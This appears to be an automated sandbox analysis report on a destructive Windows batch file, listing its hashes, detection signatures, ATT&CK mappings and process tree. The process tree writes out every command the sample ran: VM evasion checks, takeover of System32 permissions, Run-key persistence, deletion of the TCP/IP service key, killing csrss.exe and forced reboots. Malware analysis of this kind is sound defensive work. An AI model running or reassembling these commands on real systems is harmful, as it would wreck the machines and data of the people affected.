Analysis
-
max time kernel
46s -
max time network
50s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
08/09/2024, 06:41
Static task
static1
Behavioral task
behavioral1
Sample
custom.bat
Resource
win10-20240611-en
Behavioral task
behavioral2
Sample
custom.bat
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
custom.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
custom.bat
Resource
win11-20240802-en
Errors
General
-
Target
custom.bat
-
Size
2KB
-
MD5
6482067516f0f24cdc0a596de66c951a
-
SHA1
9a77d1d6bc48250c98e57af675dec3a2dac51ed8
-
SHA256
1b8c1fc80ad13c703485ddb7f6581584e5b538862287266b960f4994549214a3
-
SHA512
25fa1d45b9a10e97cded264824bae7e2d149850d2e0a618b448f434aedee160b7f014dca765aadd501d064e952effe5393d0163dd0cfe1bd8c03de593c037e86
Malware Config
Signatures
-
Possible privilege escalation attempt 3 IoCs
pid Process 680 icacls.exe 264 icacls.exe 2444 takeown.exe -
Modifies file permissions 1 TTPs 3 IoCs
pid Process 2444 takeown.exe 680 icacls.exe 264 icacls.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\TotalDestruction = "C:\\Users\\Admin\\AppData\\Local\\Temp\\custom.bat" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe -
pid Process 2812 powershell.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2040 tasklist.exe 1196 tasklist.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2116 sc.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 2252 ipconfig.exe -
Gathers system information 1 TTPs 3 IoCs
Runs systeminfo.exe.
pid Process 2540 systeminfo.exe 1788 systeminfo.exe 996 systeminfo.exe -
Kills process with taskkill 3 IoCs
pid Process 1684 taskkill.exe 2368 taskkill.exe 1932 taskkill.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 1600 reg.exe 2364 reg.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2812 powershell.exe 2812 powershell.exe 2812 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 2812 powershell.exe Token: SeDebugPrivilege 2040 tasklist.exe Token: SeDebugPrivilege 1196 tasklist.exe Token: SeTakeOwnershipPrivilege 2444 takeown.exe Token: SeShutdownPrivilege 2240 shutdown.exe Token: SeRemoteShutdownPrivilege 2240 shutdown.exe Token: SeShutdownPrivilege 1888 shutdown.exe Token: SeRemoteShutdownPrivilege 1888 shutdown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2780 wrote to memory of 2684 2780 cmd.exe 31 PID 2780 wrote to memory of 2684 2780 cmd.exe 31 PID 2780 wrote to memory of 2684 2780 cmd.exe 31 PID 2684 wrote to memory of 2812 2684 cmd.exe 33 PID 2684 wrote to memory of 2812 2684 cmd.exe 33 PID 2684 wrote to memory of 2812 2684 cmd.exe 33 PID 2812 wrote to memory of 2724 2812 powershell.exe 34 PID 2812 wrote to memory of 2724 2812 powershell.exe 34 PID 2812 wrote to memory of 2724 2812 powershell.exe 34 PID 2684 wrote to memory of 2540 2684 cmd.exe 36 PID 2684 wrote to memory of 2540 2684 cmd.exe 36 PID 2684 wrote to memory of 2540 2684 cmd.exe 36 PID 2684 wrote to memory of 2560 2684 cmd.exe 37 PID 2684 wrote to memory of 2560 2684 cmd.exe 37 PID 2684 wrote to memory of 2560 2684 cmd.exe 37 PID 2684 wrote to memory of 1788 2684 cmd.exe 40 PID 2684 wrote to memory of 1788 2684 cmd.exe 40 PID 2684 wrote to memory of 1788 2684 cmd.exe 40 PID 2684 wrote to memory of 2208 2684 cmd.exe 41 PID 2684 wrote to memory of 2208 2684 cmd.exe 41 PID 2684 wrote to memory of 2208 2684 cmd.exe 41 PID 2684 wrote to memory of 996 2684 cmd.exe 42 PID 2684 wrote to memory of 996 2684 cmd.exe 42 PID 2684 wrote to memory of 996 2684 cmd.exe 42 PID 2684 wrote to memory of 2604 2684 cmd.exe 43 PID 2684 wrote to memory of 2604 2684 cmd.exe 43 PID 2684 wrote to memory of 2604 2684 cmd.exe 43 PID 2684 wrote to memory of 2040 2684 cmd.exe 44 PID 2684 wrote to memory of 2040 2684 cmd.exe 44 PID 2684 wrote to memory of 2040 2684 cmd.exe 44 PID 2684 wrote to memory of 1692 2684 cmd.exe 45 PID 2684 wrote to memory of 1692 2684 cmd.exe 45 PID 2684 wrote to memory of 1692 2684 cmd.exe 45 PID 2684 wrote to memory of 1196 2684 cmd.exe 46 PID 2684 wrote to memory of 1196 2684 cmd.exe 46 PID 2684 wrote to memory of 1196 2684 cmd.exe 46 PID 2684 wrote to memory of 2268 2684 cmd.exe 47 PID 2684 wrote to memory of 2268 2684 cmd.exe 47 PID 2684 wrote to memory of 2268 2684 cmd.exe 47 PID 2684 wrote to memory of 2444 2684 cmd.exe 48 PID 2684 wrote to memory of 2444 2684 cmd.exe 48 PID 2684 wrote to memory of 2444 2684 cmd.exe 48 PID 2684 wrote to memory of 680 2684 cmd.exe 49 PID 2684 wrote to memory of 680 2684 cmd.exe 49 PID 2684 wrote to memory of 680 2684 cmd.exe 49 PID 2684 wrote to memory of 264 2684 cmd.exe 50 PID 2684 wrote to memory of 264 2684 cmd.exe 50 PID 2684 wrote to memory of 264 2684 cmd.exe 50 PID 2684 wrote to memory of 588 2684 cmd.exe 51 PID 2684 wrote to memory of 588 2684 cmd.exe 51 PID 2684 wrote to memory of 588 2684 cmd.exe 51 PID 2684 wrote to memory of 1600 2684 cmd.exe 52 PID 2684 wrote to memory of 1600 2684 cmd.exe 52 PID 2684 wrote to memory of 1600 2684 cmd.exe 52 PID 2684 wrote to memory of 1684 2684 cmd.exe 53 PID 2684 wrote to memory of 1684 2684 cmd.exe 53 PID 2684 wrote to memory of 1684 2684 cmd.exe 53 PID 2684 wrote to memory of 2368 2684 cmd.exe 54 PID 2684 wrote to memory of 2368 2684 cmd.exe 54 PID 2684 wrote to memory of 2368 2684 cmd.exe 54 PID 2684 wrote to memory of 2252 2684 cmd.exe 55 PID 2684 wrote to memory of 2252 2684 cmd.exe 55 PID 2684 wrote to memory of 2252 2684 cmd.exe 55 PID 2684 wrote to memory of 2404 2684 cmd.exe 56
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min2⤵
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process cmd -Verb runAs"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:2724
-
-
-
C:\Windows\system32\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:2540
-
-
C:\Windows\system32\findstr.exefindstr /i "VirtualBox"3⤵PID:2560
-
-
C:\Windows\system32\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:1788
-
-
C:\Windows\system32\findstr.exefindstr /i "VMware"3⤵PID:2208
-
-
C:\Windows\system32\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:996
-
-
C:\Windows\system32\findstr.exefindstr /i "Hyper-V"3⤵PID:2604
-
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
C:\Windows\system32\findstr.exefindstr /i "vmsrvc.exe"3⤵PID:1692
-
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
C:\Windows\system32\findstr.exefindstr /i "VBoxService.exe"3⤵PID:2268
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\* /r /d y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\* /grant Admin:F /t /c3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:680
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\* /grant Admin:F /t /c3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:264
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f3⤵
- Adds Run key to start application
PID:588
-
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:1600
-
-
C:\Windows\system32\taskkill.exetaskkill /IM vmsrvc.exe /F3⤵
- Kills process with taskkill
PID:1684
-
-
C:\Windows\system32\taskkill.exetaskkill /IM VBoxService.exe /F3⤵
- Kills process with taskkill
PID:2368
-
-
C:\Windows\system32\ipconfig.exeipconfig /release3⤵
- Gathers network information
PID:2252
-
-
C:\Windows\system32\netsh.exenetsh interface ip delete arpcache3⤵PID:2404
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\Tcpip /f3⤵
- Modifies registry key
PID:2364
-
-
C:\Windows\system32\sc.exesc stop i8042prt3⤵
- Launches sc.exe
PID:2116
-
-
C:\Windows\system32\taskkill.exetaskkill /IM csrss.exe /F3⤵
- Kills process with taskkill
PID:1932
-
-
C:\Windows\system32\shutdown.exeshutdown /r /f /t 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
C:\Windows\system32\shutdown.exeshutdown /r /f /t 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
-
C:\Windows\system32\shutdown.exeshutdown /r /f /t 03⤵PID:2172
-
-
C:\Windows\system32\shutdown.exeshutdown /r /f /t 03⤵PID:3044
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:2392
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:2092
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1